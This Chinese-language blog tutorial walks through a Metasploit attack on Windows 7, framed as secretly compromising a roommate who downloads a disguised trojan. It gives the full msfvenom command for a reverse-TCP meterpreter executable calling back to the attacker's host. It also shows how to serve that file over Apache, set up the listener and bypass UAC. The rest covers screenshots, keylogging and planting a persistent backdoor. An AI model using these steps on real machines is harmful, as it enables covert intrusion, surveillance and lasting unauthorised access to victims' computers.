kali渗透-基础篇

渗透之meterpreter

模拟场景:小明是我室友,整天游戏人生,浑浑噩噩,前途迷茫,每次上课交作业都要看我的,于是我开启了apche服务器,给他下载作业(别问我为什么不用QQ传,因为要装逼!),他无意中看到我的一些其他软件,并也一起打包下载了,并且运行了一个*.exe程序,嘿嘿,从此他的电脑上便再无秘密可言。

0x1.实验环境

  VMware

  kali(linux)系统 kali ip:192.168.127.128

  windows 7专业版

  kali镜像官方下载地址->>https://www.kali.org/downloads/

0x2.开始实验

  0x2.1.终端进入msfconsole控制台

  输入->>msfconsole      回车即可

  kali渗透-基础篇

  生成木马程序

  输入->>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.127.128 LPORT=4444 -f exe > 1.exe

  提示:命令中的ip地址为kali IP地址,端口号可自行设定(尽量设置为不常用端口号),1.exe为木马程序,名字随意,由.exe结尾即可。

  kali渗透-基础篇

  开启一个新终端

  kali渗透-基础篇

  开启apache服务,将默认主页删除并复制1.exe文件到该目录下

  输入->>service apache2 start

    ->>rm /var/www/html/*

    ->>cp 1.exe /var/www/html/

  win7在同一局域网内主机就可以访问到:http://192.168.127.128:80

  kali渗透-基础篇

  

  

  win7点击1.exe文件即可下载,现在我们将该文件下载下来放到桌面上运行。

  回到kali的msf上,使用监听模块,设置一些参数,输入options即可查看需要设置的参数。

  输入->>use exploit/multi/handler

    ->>set payload windows/meterpreter/reverse_tcp

    ->>set LHost 192.168.127.128

    ->>set LPORT 4444

提示:IP为kali IP地址,端口为之前生成1.exe时端口,默认端口为4444

  kali渗透-基础篇

  执行exploit即可连上win7了

  kali渗透-基础篇

  查看当前权限

  输入命令->>getuid

  kali渗透-基础篇

  显示系统权限,那就可以做很多事情了。

  可能做到这里就只有用户权限了,那也是没关系的!

  可以先试试获取远端桌面截屏,记录键盘等

  截屏操作

  输入->>screenshot

  kali渗透-基础篇

  还有就是键盘记录,你输了什么我都知道,哈哈哈。

  kali渗透-基础篇

  如果不是system权限或administrator权限就需要提权。

  shell命令打开win7终端

  提权

  说明:本来我第一次做的时候拿到的也是用户权限,找了一些资料,试了几种方法均未成功,后来看到一篇win7提权的,终于成功了!

  以exploit/windows/local/bypassuac模块为例

  该模块在windows 32位和64位下都有效。

  msf > use exploit/windows/local/bypassuac
     ->> set session 2
     ->> exploit
  用sessions命令就可以看到自己的编号了,我这里是2
  kali渗透-基础篇 
  植入后门 
    提升权限完第一件事就是留后门了。
    现在只不过是放了一个马而已,下次启动就不运行了,这怎么行!所以我们得留个后门啊!
    输入->>run persistence -X -i 5 -p 4444 -r 192.168.127.128
  kali渗透-基础篇
  -X为开机自启 -i为反向连接
  metsvc攻击
    开启一个会话服务
    输入->>run metsvc
  kali渗透-基础篇
  win7上已经有了。
  kali渗透-基础篇

  

  

  

参考来自-》》https://xz.aliyun.com/t/2536#toc-2

    -》》https://paper.seebug.org/29/

提权文章使用的是->>https://www.cnblogs.com/wh4am1/p/6602650.html方法,可以尝试其他方法进行提权哦!

上一篇:Openfire注册流程代码分析


下一篇:eclipse中搭建ssm框架